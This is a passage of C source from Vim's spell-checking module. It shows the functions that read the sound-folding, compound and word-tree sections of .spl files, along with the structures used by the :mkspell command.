first[*ftp->ft_from] = i;
}
return 0;
}
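/*
 * Illustrative example for the first-index table built at the end of
 * read_rep_section(): if the REP "from" strings are "ch", "ck" and "k" (in
 * that order), then first['c'] == 0 and first['k'] == 2, while all other
 * entries stay -1, so a lookup can jump straight to the first entry that
 * starts with a given byte.  These strings are made-up sample values.
 */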
/*
* Read SN_SAL section: <salflags> <salcount> <sal> ...
* Return SP_*ERROR flags.
*/
static int
read_sal_section(FILE *fd, slang_T *slang)
{
int i;
int cnt;
garray_T *gap;
salitem_T *smp;
int ccnt;
char_u *p;
int c = NUL;
slang->sl_sofo = FALSE;
i = getc(fd); /* <salflags> */
if (i & SAL_F0LLOWUP)
slang->sl_followup = TRUE;
if (i & SAL_COLLAPSE)
slang->sl_collapse = TRUE;
if (i & SAL_REM_ACCENTS)
slang->sl_rem_accents = TRUE;
cnt = get2c(fd); /* <salcount> */
if (cnt < 0)
return SP_TRUNCERROR;
gap = &slang->sl_sal;
ga_init2(gap, sizeof(salitem_T), 10);
if (ga_grow(gap, cnt + 1) == FAIL)
return SP_OTHERERROR;
/* <sal> : <salfromlen> <salfrom> <saltolen> <salto> */
for (; gap->ga_len < cnt; ++gap->ga_len)
{
smp = &((salitem_T *)gap->ga_data)[gap->ga_len];
ccnt = getc(fd); /* <salfromlen> */
if (ccnt < 0)
return SP_TRUNCERROR;
if ((p = alloc(ccnt + 2)) == NULL)
return SP_OTHERERROR;
smp->sm_lead = p;
/* Read up to the first special char into sm_lead. */
for (i = 0; i < ccnt; ++i)
{
c = getc(fd); /* <salfrom> */
if (vim_strchr((char_u *)"0123456789(-<^$", c) != NULL)
break;
*p++ = c;
}
smp->sm_leadlen = (int)(p - smp->sm_lead);
*p++ = NUL;
/* Put (abc) chars in sm_oneof, if any. */
if (c == '(')
{
smp->sm_oneof = p;
for (++i; i < ccnt; ++i)
{
c = getc(fd); /* <salfrom> */
if (c == ')')
break;
*p++ = c;
}
*p++ = NUL;
if (++i < ccnt)
c = getc(fd);
}
else
smp->sm_oneof = NULL;
/* Any following chars go in sm_rules. */
smp->sm_rules = p;
if (i < ccnt)
/* store the char we got while checking for end of sm_lead */
*p++ = c;
for (++i; i < ccnt; ++i)
*p++ = getc(fd); /* <salfrom> */
*p++ = NUL;
/* <saltolen> <salto> */
smp->sm_to = read_cnt_string(fd, 1, &ccnt);
if (ccnt < 0)
{
vim_free(smp->sm_lead);
return ccnt;
}
#ifdef FEAT_MBYTE
if (has_mbyte)
{
/* convert the multi-byte strings to wide char strings */
smp->sm_lead_w = mb_str2wide(smp->sm_lead);
smp->sm_leadlen = mb_charlen(smp->sm_lead);
if (smp->sm_oneof == NULL)
smp->sm_oneof_w = NULL;
else
smp->sm_oneof_w = mb_str2wide(smp->sm_oneof);
if (smp->sm_to == NULL)
smp->sm_to_w = NULL;
else
smp->sm_to_w = mb_str2wide(smp->sm_to);
if (smp->sm_lead_w == NULL
|| (smp->sm_oneof_w == NULL && smp->sm_oneof != NULL)
|| (smp->sm_to_w == NULL && smp->sm_to != NULL))
{
vim_free(smp->sm_lead);
vim_free(smp->sm_to);
vim_free(smp->sm_lead_w);
vim_free(smp->sm_oneof_w);
vim_free(smp->sm_to_w);
return SP_OTHERERROR;
}
}
#endif
}
if (gap->ga_len > 0)
{
/* Add one extra entry to mark the end with an empty sm_lead. Avoids
* that we need to check the index every time. */
smp = &((salitem_T *)gap->ga_data)[gap->ga_len];
if ((p = alloc(1)) == NULL)
return SP_OTHERERROR;
p[0] = NUL;
smp->sm_lead = p;
smp->sm_leadlen = 0;
smp->sm_oneof = NULL;
smp->sm_rules = p;
smp->sm_to = NULL;
#ifdef FEAT_MBYTE
if (has_mbyte)
{
smp->sm_lead_w = mb_str2wide(smp->sm_lead);
smp->sm_leadlen = 0;
smp->sm_oneof_w = NULL;
smp->sm_to_w = NULL;
}
#endif
++gap->ga_len;
}
/* Fill the first-index table. */
set_sal_first(slang);
return 0;
}
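/*
 * Illustrative example for the parsing in read_sal_section() above: a
 * <salfrom> string such as "CH(AOU)-" is split into sm_lead = "CH" (the
 * chars before the first special char), sm_oneof = "AOU" (the chars between
 * the parens) and sm_rules = "-" (the remaining rule chars); the <salto>
 * string is stored in sm_to.  This is a made-up sample value, not taken
 * from a real spell file.
 */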
/*
* Read SN_WORDS: <word> ...
* Return SP_*ERROR flags.
*/
static int
read_words_section(FILE *fd, slang_T *lp, int len)
{
int done = 0;
int i;
int c;
char_u word[MAXWLEN];
while (done < len)
{
/* Read one word at a time. */
for (i = 0; ; ++i)
{
c = getc(fd);
if (c == EOF)
return SP_TRUNCERROR;
word[i] = c;
if (word[i] == NUL)
break;
if (i == MAXWLEN - 1)
return SP_FORMERROR;
}
/* Init the count to 10. */
count_common_word(lp, word, -1, 10);
done += i + 1;
}
return 0;
}
/*
* SN_SOFO: <sofofromlen> <sofofrom> <sofotolen> <sofoto>
* Return SP_*ERROR flags.
*/
static int
read_sofo_section(FILE *fd, slang_T *slang)
{
int cnt;
char_u *from, *to;
int res;
slang->sl_sofo = TRUE;
/* <sofofromlen> <sofofrom> */
from = read_cnt_string(fd, 2, &cnt);
if (cnt < 0)
return cnt;
/* <sofotolen> <sofoto> */
to = read_cnt_string(fd, 2, &cnt);
if (cnt < 0)
{
vim_free(from);
return cnt;
}
/* Store the info in slang->sl_sal and/or slang->sl_sal_first. */
if (from != NULL && to != NULL)
res = set_sofo(slang, from, to);
else if (from != NULL || to != NULL)
res = SP_FORMERROR; /* only one of two strings is an error */
else
res = 0;
vim_free(from);
vim_free(to);
return res;
}
/*
* Read the compound section from the .spl file:
* <compmax> <compminlen> <compsylmax> <compoptions> <compflags>
* Returns SP_*ERROR flags.
*/
static int
read_compound(FILE *fd, slang_T *slang, int len)
{
int todo = len;
int c;
int atstart;
char_u *pat;
char_u *pp;
char_u *cp;
char_u *ap;
char_u *crp;
int cnt;
garray_T *gap;
if (todo < 2)
return SP_FORMERROR; /* need at least two bytes */
--todo;
c = getc(fd); /* <compmax> */
if (c < 2)
c = MAXWLEN;
slang->sl_compmax = c;
--todo;
c = getc(fd); /* <compminlen> */
if (c < 1)
c = 0;
slang->sl_compminlen = c;
--todo;
c = getc(fd); /* <compsylmax> */
if (c < 1)
c = MAXWLEN;
slang->sl_compsylmax = c;
c = getc(fd); /* <compoptions> */
if (c != 0)
ungetc(c, fd); /* be backwards compatible with Vim 7.0b */
else
{
--todo;
c = getc(fd); /* only use the lower byte for now */
--todo;
slang->sl_compoptions = c;
gap = &slang->sl_comppat;
c = get2c(fd); /* <comppatcount> */
todo -= 2;
ga_init2(gap, sizeof(char_u *), c);
if (ga_grow(gap, c) == OK)
while (--c >= 0)
{
((char_u **)(gap->ga_data))[gap->ga_len++] =
read_cnt_string(fd, 1, &cnt);
/* <comppatlen> <comppattext> */
if (cnt < 0)
return cnt;
todo -= cnt + 1;
}
}
if (todo < 0)
return SP_FORMERROR;
/* Turn the COMPOUNDRULE items into a regexp pattern:
* "a[bc]/a*b+" -> "^\(a[bc]\|a*b\+\)$".
* Inserting backslashes may double the length, "^\(\)$<Nul>" is 7 bytes.
* Conversion to utf-8 may double the size. */
c = todo * 2 + 7;
#ifdef FEAT_MBYTE
if (enc_utf8)
c += todo * 2;
#endif
pat = alloc((unsigned)c);
if (pat == NULL)
return SP_OTHERERROR;
/* We also need a list of all flags that can appear at the start and one
* for all flags. */
cp = alloc(todo + 1);
if (cp == NULL)
{
vim_free(pat);
return SP_OTHERERROR;
}
slang->sl_compstartflags = cp;
*cp = NUL;
ap = alloc(todo + 1);
if (ap == NULL)
{
vim_free(pat);
return SP_OTHERERROR;
}
slang->sl_compallflags = ap;
*ap = NUL;
/* And a list of all patterns in their original form, for checking whether
* compounding may work in match_compoundrule(). This is freed when we
     * encounter a wildcard, because the check doesn't work then. */
crp = alloc(todo + 1);
slang->sl_comprules = crp;
pp = pat;
*pp++ = '^';
*pp++ = '\\';
*pp++ = '(';
atstart = 1;
while (todo-- > 0)
{
c = getc(fd); /* <compflags> */
if (c == EOF)
{
vim_free(pat);
return SP_TRUNCERROR;
}
/* Add all flags to "sl_compallflags". */
if (vim_strchr((char_u *)"?*+[]/", c) == NULL
&& !byte_in_str(slang->sl_compallflags, c))
{
*ap++ = c;
*ap = NUL;
}
if (atstart != 0)
{
/* At start of item: copy flags to "sl_compstartflags". For a
* [abc] item set "atstart" to 2 and copy up to the ']'. */
if (c == '[')
atstart = 2;
else if (c == ']')
atstart = 0;
else
{
if (!byte_in_str(slang->sl_compstartflags, c))
{
*cp++ = c;
*cp = NUL;
}
if (atstart == 1)
atstart = 0;
}
}
/* Copy flag to "sl_comprules", unless we run into a wildcard. */
if (crp != NULL)
{
if (c == '?' || c == '+' || c == '*')
{
vim_free(slang->sl_comprules);
slang->sl_comprules = NULL;
crp = NULL;
}
else
*crp++ = c;
}
if (c == '/') /* slash separates two items */
{
*pp++ = '\\';
*pp++ = '|';
atstart = 1;
}
else /* normal char, "[abc]" and '*' are copied as-is */
{
if (c == '?' || c == '+' || c == '~')
*pp++ = '\\'; /* "a?" becomes "a\?", "a+" becomes "a\+" */
#ifdef FEAT_MBYTE
if (enc_utf8)
pp += mb_char2bytes(c, pp);
else
#endif
*pp++ = c;
}
}
*pp++ = '\\';
*pp++ = ')';
*pp++ = '$';
*pp = NUL;
if (crp != NULL)
*crp = NUL;
slang->sl_compprog = vim_regcomp(pat, RE_MAGIC + RE_STRING + RE_STRICT);
vim_free(pat);
if (slang->sl_compprog == NULL)
return SP_FORMERROR;
return 0;
}
/*
* Set the SOFOFROM and SOFOTO items in language "lp".
* Returns SP_*ERROR flags when there is something wrong.
*/
static int
set_sofo(slang_T *lp, char_u *from, char_u *to)
{
int i;
#ifdef FEAT_MBYTE
garray_T *gap;
char_u *s;
char_u *p;
int c;
int *inp;
if (has_mbyte)
{
/* Use "sl_sal" as an array with 256 pointers to a list of wide
* characters. The index is the low byte of the character.
* The list contains from-to pairs with a terminating NUL.
* sl_sal_first[] is used for latin1 "from" characters. */
gap = &lp->sl_sal;
ga_init2(gap, sizeof(int *), 1);
if (ga_grow(gap, 256) == FAIL)
return SP_OTHERERROR;
vim_memset(gap->ga_data, 0, sizeof(int *) * 256);
gap->ga_len = 256;
/* First count the number of items for each list. Temporarily use
* sl_sal_first[] for this. */
for (p = from, s = to; *p != NUL && *s != NUL; )
{
c = mb_cptr2char_adv(&p);
mb_cptr_adv(s);
if (c >= 256)
++lp->sl_sal_first[c & 0xff];
}
if (*p != NUL || *s != NUL) /* lengths differ */
return SP_FORMERROR;
/* Allocate the lists. */
for (i = 0; i < 256; ++i)
if (lp->sl_sal_first[i] > 0)
{
p = alloc(sizeof(int) * (lp->sl_sal_first[i] * 2 + 1));
if (p == NULL)
return SP_OTHERERROR;
((int **)gap->ga_data)[i] = (int *)p;
*(int *)p = 0;
}
/* Put the characters up to 255 in sl_sal_first[] the rest in a sl_sal
* list. */
vim_memset(lp->sl_sal_first, 0, sizeof(salfirst_T) * 256);
for (p = from, s = to; *p != NUL && *s != NUL; )
{
c = mb_cptr2char_adv(&p);
i = mb_cptr2char_adv(&s);
if (c >= 256)
{
/* Append the from-to chars at the end of the list with
* the low byte. */
inp = ((int **)gap->ga_data)[c & 0xff];
while (*inp != 0)
++inp;
*inp++ = c; /* from char */
*inp++ = i; /* to char */
*inp++ = NUL; /* NUL at the end */
}
else
/* mapping byte to char is done in sl_sal_first[] */
lp->sl_sal_first[c] = i;
}
}
else
#endif
{
/* mapping bytes to bytes is done in sl_sal_first[] */
if (STRLEN(from) != STRLEN(to))
return SP_FORMERROR;
for (i = 0; to[i] != NUL; ++i)
lp->sl_sal_first[from[i]] = to[i];
lp->sl_sal.ga_len = 1; /* indicates we have soundfolding */
}
return 0;
}
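/*
 * Illustrative example for the single-byte branch of set_sofo(): with
 * SOFOFROM "abc" and SOFOTO "xyz" it stores sl_sal_first['a'] = 'x',
 * sl_sal_first['b'] = 'y' and sl_sal_first['c'] = 'z', and sets
 * sl_sal.ga_len to 1 to signal that soundfolding is available.  The strings
 * are made-up sample values.
 */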
/*
* Fill the first-index table for "lp".
*/
static void
set_sal_first(slang_T *lp)
{
salfirst_T *sfirst;
int i;
salitem_T *smp;
int c;
garray_T *gap = &lp->sl_sal;
sfirst = lp->sl_sal_first;
for (i = 0; i < 256; ++i)
sfirst[i] = -1;
smp = (salitem_T *)gap->ga_data;
for (i = 0; i < gap->ga_len; ++i)
{
#ifdef FEAT_MBYTE
if (has_mbyte)
/* Use the lowest byte of the first character. For latin1 it's
* the character, for other encodings it should differ for most
* characters. */
c = *smp[i].sm_lead_w & 0xff;
else
#endif
c = *smp[i].sm_lead;
if (sfirst[c] == -1)
{
sfirst[c] = i;
#ifdef FEAT_MBYTE
if (has_mbyte)
{
int n;
/* Make sure all entries with this byte are following each
* other. Move the ones that are in the wrong position. Do
* keep the same ordering! */
while (i + 1 < gap->ga_len
&& (*smp[i + 1].sm_lead_w & 0xff) == c)
/* Skip over entry with same index byte. */
++i;
for (n = 1; i + n < gap->ga_len; ++n)
if ((*smp[i + n].sm_lead_w & 0xff) == c)
{
salitem_T tsal;
/* Move entry with same index byte after the entries
* we already found. */
++i;
--n;
tsal = smp[i + n];
mch_memmove(smp + i + 1, smp + i,
sizeof(salitem_T) * n);
smp[i] = tsal;
}
}
#endif
}
}
}
#ifdef FEAT_MBYTE
/*
* Turn a multi-byte string into a wide character string.
 * Return it in allocated memory (NULL for out-of-memory).
*/
static int *
mb_str2wide(char_u *s)
{
int *res;
char_u *p;
int i = 0;
res = (int *)alloc(sizeof(int) * (mb_charlen(s) + 1));
if (res != NULL)
{
for (p = s; *p != NUL; )
res[i++] = mb_ptr2char_adv(&p);
res[i] = NUL;
}
return res;
}
#endif
/*
* Read a tree from the .spl or .sug file.
* Allocates the memory and stores pointers in "bytsp" and "idxsp".
* This is skipped when the tree has zero length.
* Returns zero when OK, SP_ value for an error.
*/
static int
spell_read_tree(
FILE *fd,
char_u **bytsp,
idx_T **idxsp,
int prefixtree, /* TRUE for the prefix tree */
int prefixcnt) /* when "prefixtree" is TRUE: prefix count */
{
int len;
int idx;
char_u *bp;
idx_T *ip;
/* The tree size was computed when writing the file, so that we can
* allocate it as one long block. <nodecount> */
len = get4c(fd);
if (len < 0)
return SP_TRUNCERROR;
if (len > 0)
{
/* Allocate the byte array. */
bp = lalloc((long_u)len, TRUE);
if (bp == NULL)
return SP_OTHERERROR;
*bytsp = bp;
/* Allocate the index array. */
ip = (idx_T *)lalloc_clear((long_u)(len * sizeof(int)), TRUE);
if (ip == NULL)
return SP_OTHERERROR;
*idxsp = ip;
/* Recursively read the tree and store it in the array. */
idx = read_tree_node(fd, bp, ip, len, 0, prefixtree, prefixcnt);
if (idx < 0)
return idx;
}
return 0;
}
/*
* Read one row of siblings from the spell file and store it in the byte array
* "byts" and index array "idxs". Recursively read the children.
*
* NOTE: The code here must match put_node()!
*
* Returns the index (>= 0) following the siblings.
* Returns SP_TRUNCERROR if the file is shorter than expected.
* Returns SP_FORMERROR if there is a format error.
*/
static idx_T
read_tree_node(
FILE *fd,
char_u *byts,
idx_T *idxs,
int maxidx, /* size of arrays */
idx_T startidx, /* current index in "byts" and "idxs" */
int prefixtree, /* TRUE for reading PREFIXTREE */
int maxprefcondnr) /* maximum for <prefcondnr> */
{
int len;
int i;
int n;
idx_T idx = startidx;
int c;
int c2;
#define SHARED_MASK 0x8000000
len = getc(fd); /* <siblingcount> */
if (len <= 0)
return SP_TRUNCERROR;
if (startidx + len >= maxidx)
return SP_FORMERROR;
byts[idx++] = len;
/* Read the byte values, flag/region bytes and shared indexes. */
for (i = 1; i <= len; ++i)
{
c = getc(fd); /* <byte> */
if (c < 0)
return SP_TRUNCERROR;
if (c <= BY_SPECIAL)
{
if (c == BY_NOFLAGS && !prefixtree)
{
/* No flags, all regions. */
idxs[idx] = 0;
c = 0;
}
else if (c != BY_INDEX)
{
if (prefixtree)
{
/* Read the optional pflags byte, the prefix ID and the
* condition nr. In idxs[] store the prefix ID in the low
* byte, the condition index shifted up 8 bits, the flags
* shifted up 24 bits. */
if (c == BY_FLAGS)
c = getc(fd) << 24; /* <pflags> */
else
c = 0;
c |= getc(fd); /* <affixID> */
n = get2c(fd); /* <prefcondnr> */
if (n >= maxprefcondnr)
return SP_FORMERROR;
c |= (n << 8);
}
else /* c must be BY_FLAGS or BY_FLAGS2 */
{
/* Read flags and optional region and prefix ID. In
* idxs[] the flags go in the low two bytes, region above
* that and prefix ID above the region. */
c2 = c;
c = getc(fd); /* <flags> */
if (c2 == BY_FLAGS2)
c = (getc(fd) << 8) + c; /* <flags2> */
if (c & WF_REGION)
c = (getc(fd) << 16) + c; /* <region> */
if (c & WF_AFX)
c = (getc(fd) << 24) + c; /* <affixID> */
}
idxs[idx] = c;
c = 0;
}
else /* c == BY_INDEX */
{
/* <nodeidx> */
n = get3c(fd);
if (n < 0 || n >= maxidx)
return SP_FORMERROR;
idxs[idx] = n + SHARED_MASK;
c = getc(fd); /* <xbyte> */
}
}
byts[idx++] = c;
}
/* Recursively read the children for non-shared siblings.
* Skip the end-of-word ones (zero byte value) and the shared ones (and
* remove SHARED_MASK) */
for (i = 1; i <= len; ++i)
if (byts[startidx + i] != 0)
{
if (idxs[startidx + i] & SHARED_MASK)
idxs[startidx + i] &= ~SHARED_MASK;
else
{
idxs[startidx + i] = idx;
idx = read_tree_node(fd, byts, idxs, maxidx, idx,
prefixtree, maxprefcondnr);
if (idx < 0)
break;
}
}
return idx;
}
/*
* Reload the spell file "fname" if it's loaded.
*/
static void
spell_reload_one(
char_u *fname,
int added_word) /* invoked through "zg" */
{
slang_T *slang;
int didit = FALSE;
for (slang = first_lang; slang != NULL; slang = slang->sl_next)
{
if (fullpathcmp(fname, slang->sl_fname, FALSE) == FPC_SAME)
{
slang_clear(slang);
if (spell_load_file(fname, NULL, slang, FALSE) == NULL)
/* reloading failed, clear the language */
slang_clear(slang);
redraw_all_later(SOME_VALID);
didit = TRUE;
}
}
/* When "zg" was used and the file wasn't loaded yet, should redo
* 'spelllang' to load it now. */
if (added_word && !didit)
did_set_spelllang(curwin);
}
/*
* Functions for ":mkspell".
*/
#define MAXLINELEN 500 /* Maximum length in bytes of a line in a .aff
and .dic file. */
/*
* Main structure to store the contents of a ".aff" file.
*/
typedef struct afffile_S
{
char_u *af_enc; /* "SET", normalized, alloc'ed string or NULL */
int af_flagtype; /* AFT_CHAR, AFT_LONG, AFT_NUM or AFT_CAPLONG */
unsigned af_rare; /* RARE ID for rare word */
unsigned af_keepcase; /* KEEPCASE ID for keep-case word */
unsigned af_bad; /* BAD ID for banned word */
unsigned af_needaffix; /* NEEDAFFIX ID */
unsigned af_circumfix; /* CIRCUMFIX ID */
unsigned af_needcomp; /* NEEDCOMPOUND ID */
unsigned af_comproot; /* COMPOUNDROOT ID */
unsigned af_compforbid; /* COMPOUNDFORBIDFLAG ID */
unsigned af_comppermit; /* COMPOUNDPERMITFLAG ID */
unsigned af_nosuggest; /* NOSUGGEST ID */
int af_pfxpostpone; /* postpone prefixes without chop string and
without flags */
int af_ignoreextra; /* IGNOREEXTRA present */
hashtab_T af_pref; /* hashtable for prefixes, affheader_T */
hashtab_T af_suff; /* hashtable for suffixes, affheader_T */
hashtab_T af_comp; /* hashtable for compound flags, compitem_T */
} afffile_T;
#define AFT_CHAR 0 /* flags are one character */
#define AFT_LONG 1 /* flags are two characters */
#define AFT_CAPLONG 2 /* flags are one or two characters */
#define AFT_NUM 3 /* flags are numbers, comma separated */
typedef struct affentry_S affentry_T;
/* Affix entry from ".aff" file. Used for prefixes and suffixes. */
struct affentry_S
{
affentry_T *ae_next; /* next affix with same name/number */
char_u *ae_chop; /* text to chop off basic word (can be NULL) */
char_u *ae_add; /* text to add to basic word (can be NULL) */
char_u *ae_flags; /* flags on the affix (can be NULL) */
char_u *ae_cond; /* condition (NULL for ".") */
regprog_T *ae_prog; /* regexp program for ae_cond or NULL */
char ae_compforbid; /* COMPOUNDFORBIDFLAG found */
char ae_comppermit; /* COMPOUNDPERMITFLAG found */
};
#ifdef FEAT_MBYTE
# define AH_KEY_LEN 17 /* 2 x 8 bytes + NUL */
#else
# define AH_KEY_LEN 7 /* 6 digits + NUL */
#endif
/* Affix header from ".aff" file. Used for af_pref and af_suff. */
typedef struct affheader_S
{
char_u ah_key[AH_KEY_LEN]; /* key for hashtab == name of affix */
unsigned ah_flag; /* affix name as number, uses "af_flagtype" */
int ah_newID; /* prefix ID after renumbering; 0 if not used */
int ah_combine; /* suffix may combine with prefix */
int ah_follows; /* another affix block should be following */
affentry_T *ah_first; /* first affix entry */
} affheader_T;
#define HI2AH(hi) ((affheader_T *)(hi)->hi_key)
/* Flag used in compound items. */
typedef struct compitem_S
{
char_u ci_key[AH_KEY_LEN]; /* key for hashtab == name of compound */
unsigned ci_flag; /* affix name as number, uses "af_flagtype" */
int ci_newID; /* affix ID after renumbering. */
} compitem_T;
#define HI2CI(hi) ((compitem_T *)(hi)->hi_key)
/*
* Structure that is used to store the items in the word tree. This avoids
* the need to keep track of each allocated thing, everything is freed all at
* once after ":mkspell" is done.
* Note: "sb_next" must be just before "sb_data" to make sure the alignment of
* "sb_data" is correct for systems where pointers must be aligned on
* pointer-size boundaries and sizeof(pointer) > sizeof(int) (e.g., Sparc).
*/
#define SBLOCKSIZE 16000 /* size of sb_data */
typedef struct sblock_S sblock_T;
struct sblock_S
{
int sb_used; /* nr of bytes already in use */
sblock_T *sb_next; /* next block in list */
char_u sb_data[1]; /* data, actually longer */
};
/*
* A node in the tree.
*/
typedef struct wordnode_S wordnode_T;
struct wordnode_S
{
union /* shared to save space */
{
char_u hashkey[6]; /* the hash key, only used while compressing */
int index; /* index in written nodes (valid after first
round) */
} wn_u1;
union /* shared to save space */
{
wordnode_T *next; /* next node with same hash key */
wordnode_T *wnode; /* parent node that will write this node */
} wn_u2;
wordnode_T *wn_child; /* child (next byte in word) */
wordnode_T *wn_sibling; /* next sibling (alternate byte in word,
always sorted) */
int wn_refs; /* Nr. of references to this node. Only
relevant for first node in a list of
siblings, in following siblings it is
always one. */
char_u wn_byte; /* Byte for this node. NUL for word end */
/* Info for when "wn_byte" is NUL.
* In PREFIXTREE "wn_region" is used for the prefcondnr.
* In the soundfolded word tree "wn_flags" has the MSW of the wordnr and
* "wn_region" the LSW of the wordnr. */
char_u wn_affixID; /* supported/required prefix ID or 0 */
short_u wn_flags; /* WF_ flags */
short wn_region; /* region mask */
#ifdef SPELL_PRINTTREE
int wn_nr; /* sequence nr for printing */
#endif
};
#define WN_MASK 0xffff /* mask relevant bits of "wn_flags" */
#define HI2WN(hi) (wordnode_T *)((hi)->hi_key)
/*
* Info used while reading the spell files.
*/
typedef struct spellinfo_S
{
wordnode_T *si_foldroot; /* tree with case-folded words */
long si_foldwcount; /* nr of words in si_foldroot */
wordnode_T *si_keeproot; /* tree with keep-case words */
long si_keepwcount; /* nr of words in si_keeproot */
wordnode_T *si_prefroot; /* tree with postponed prefixes */
long si_sugtree; /* creating the soundfolding trie */
sblock_T *si_blocks; /* memory blocks used */
long si_blocks_cnt; /* memory blocks allocated */
int si_did_emsg; /* TRUE when ran out of memory */
long si_compress_cnt; /* words to add before lowering
compression limit */
wordnode_T *si_first_free; /* List of nodes that have been freed during
compression, linked by "wn_child" field. */
long si_free_count; /* number of nodes in si_first_free */
#ifdef SPELL_PRINTTREE
int si_wordnode_nr; /* sequence nr for nodes */
#endif
buf_T *si_spellbuf; /* buffer used to store soundfold word table */
int si_ascii; /* handling only ASCII words */
int si_add; /* addition file */
int si_clear_chartab; /* when TRUE clear char tables */
int si_region; /* region mask */
vimconv_T si_conv; /* for conversion to 'encoding' */
int si_memtot; /* runtime memory used */
int si_verbose; /* verbose messages */
int si_msg_count; /* number of words added since last message */
char_u *si_info; /* info text chars or NULL */
int si_region_count; /* number of regions supported (1 when there
are no regions) */
char_u si_region_name[17]; /* region names; used only if
* si_region_count > 1 */
garray_T si_rep; /* list of fromto_T entries from REP lines */
garray_T si_repsal; /* list of fromto_T entries from REPSAL lines */
garray_T si_sal; /* list of fromto_T entries from SAL lines */
char_u *si_sofofr; /* SOFOFROM text */
char_u *si_sofoto; /* SOFOTO text */
int si_nosugfile; /* NOSUGFILE item found */
int si_nosplitsugs; /* NOSPLITSUGS item found */
int si_nocompoundsugs; /* NOCOMPOUNDSUGS item found */
int si_followup; /* soundsalike: ? */
int si_collapse; /* soundsalike: ? */
hashtab_T si_commonwords; /* hashtable for common words */
time_t si_sugtime; /* timestamp for .sug file */
int si_rem_accents; /* soundsalike: remove accents */
garray_T si_map; /* MAP info concatenated */
char_u *si_midword; /* MIDWORD chars or NULL */
int si_compmax; /* max nr of words for compounding */
int si_compminlen; /* minimal length for compounding */
int si_compsylmax; /* max nr of syllables for compounding */
int si_compoptions; /* COMP_ flags */
garray_T si_comppat; /* CHECKCOMPOUNDPATTERN items, each stored as
a string */
char_u *si_compflags; /* flags used for compounding */
char_u si_nobreak; /* NOBREAK */
char_u *si_syllable; /* syllable string */
garray_T si_prefcond; /* table with conditions for postponed
* prefixes, each stored as a string */
int si_newprefID; /* current value for ah_newID */
int si_newcompID; /* current value for compound ID */
} spellinfo_T;
static afffile_T *spell_read_aff(spellinfo_T *spin, char_u *fname);
static int is_aff_rule(char_u **items, int itemcnt, char *rulename, int mincount);
static void aff_process_flags(afffile_T *affile, affentry_T *entry);
static int spell_info_item(char_u *s);
static unsigned affitem2flag(int flagtype, char_u *item, char_u *fname, int lnum);
static unsigned get_affitem(int flagtype, char_u **pp);
static void process_compflags(spellinfo_T *spin, afffile_T *aff, char_u *compflags);
static void check_renumber(spellinfo_T *spin);
static int flag_in_afflist(int flagtype, char_u *afflist, unsigned flag);
static void aff_check_number(int spinval, int affval, char *name);
static void aff_check_string(char_u *spinval, char_u *affval, char *name);
static int str_equal(char_u *s1, char_u *s2);
static void add_fromto(spellinfo_T *spin, garray_T *gap, char_u *from, char_u *to);
static int sal_to_bool(char_u *s);
static void spell_free_aff(afffile_T *aff);
static int spell_read_dic(spellinfo_T *spin, char_u *fname, afffile_T *affile);
static int get_affix_flags(afffile_T *affile, char_u *afflist);
static int get_pfxlist(afffile_T *affile, char_u *afflist, char_u *store_afflist);
static void get_compflags(afffile_T *affile, char_u *afflist, char_u *store_afflist);
static int store_aff_word(spellinfo_T *spin, char_u *word, char_u *afflist, afffile_T *affile, hashtab_T *ht, hashtab_T *xht, int condit, int flags, char_u *pfxlist, int pfxlen);
static int spell_read_wordfile(spellinfo_T *spin, char_u *fname);
static void *getroom(spellinfo_T *spin, size_t len, int align);
static char_u *getroom_save(spellinfo_T *spin, char_u *s);
static void free_blocks(sblock_T *bl);
static wordnode_T *wordtree_alloc(spellinfo_T *spin);
static int store_word(spellinfo_T *spin, char_u *word, int flags, int region, char_u *pfxlist, int need_affix);
static int tree_add_word(spellinfo_T *spin, char_u *word, wordnode_T *tree, int flags, int region, int affixID);
static wordnode_T *get_wordnode(spellinfo_T *spin);
static int deref_wordnode(spellinfo_T *spin, wordnode_T *node);
static void free_wordnode(spellinfo_T *spin, wordnode_T *n);
static void wordtree_compress(spellinfo_T *spin, wordnode_T *root);
static int node_compress(spellinfo_T *spin, wordnode_T *node, hashtab_T *ht, int *tot);
static int node_equal(wordnode_T *n1, wordnode_T *n2);
static int write_vim_spell(spellinfo_T *spin, char_u *fname);
static void clear_node(wordnode_T *node);
static int put_node(FILE *fd, wordnode_T *node, int idx, int regionmask, int prefixtree);
static void spell_make_sugfile(spellinfo_T *spin, char_u *wfname);
static int sug_filltree(spellinfo_T *spin, slang_T *slang);
static int sug_maketable(spellinfo_T *spin);
static int sug_filltable(spellinfo_T *spin, wordnode_T *node, int startwordnr, garray_T *gap);
static int offset2bytes(int nr, char_u *buf);
static void sug_write(spellinfo_T *spin, char_u *fname);
static void spell_message(spellinfo_T *spin, char_u *str);
static void init_spellfile(void);
/* In the postponed prefixes tree wn_flags is used to store the WFP_ flags,
* but it must be negative to indicate the prefix tree to tree_add_word().
* Use a negative number with the lower 8 bits zero. */
#define PFX_FLAGS -256
/* flags for "condit" argument of store_aff_word() */
#define CONDIT_COMB 1 /* affix must combine */
#define CONDIT_CFIX 2 /* affix must have CIRCUMFIX flag */
#define CONDIT_SUF 4 /* add a suffix for matching flags */
#define CONDIT_AFF 8 /* word already has an affix */
/*
* Tunable parameters for when the tree is compressed. See 'mkspellmem'.
*/
static long compress_start = 30000; /* memory / SBLOCKSIZE */
static long compress_inc = 100; /* memory / SBLOCKSIZE */
static long compress_added = 500000; /* word count */
/*
* Check the 'mkspellmem' option. Return FAIL if it's wrong.
* Sets "sps_flags".
*/
int
spell_check_msm(void)
{
char_u *p = p_msm;
long start = 0;
long incr = 0;
long added = 0;
if (!VIM_ISDIGIT(*p))
return FAIL;
/* block count = (value * 1024) / SBLOCKSIZE (but avoid overflow) */
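/* (value * 10) / (SBLOCKSIZE / 102) and (value * 102) / (SBLOCKSIZE / 10)
 * both compute roughly (value * 1020) / SBLOCKSIZE, a close approximation of
 * (value * 1024) / SBLOCKSIZE that keeps the intermediate products small. */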
start = (getdigits(&p) * 10) / (SBLOCKSIZE / 102);
if (*p != ',')
return FAIL;
++p;
if (!VIM_ISDIGIT(*p))
return FAIL;
incr = (getdigits(&p) * 102) / (SBLOCKSIZE / 10);
if (*p != ',')
return FAIL;
++p;
if (!VIM_ISDIGIT(*p))
return FAIL;
added = getdigits(&p) * 1024;
if (*p != NUL)
return FAIL;
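/* All three values must be positive and the increment may not exceed the
 * start value. */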
if (start == 0 || incr == 0 || added == 0 || incr > start)
return FAIL;
compress_start = start;
compress_inc = incr;
compress_added = added;
return OK;
}
#ifdef SPELL_PRINTTREE
/*
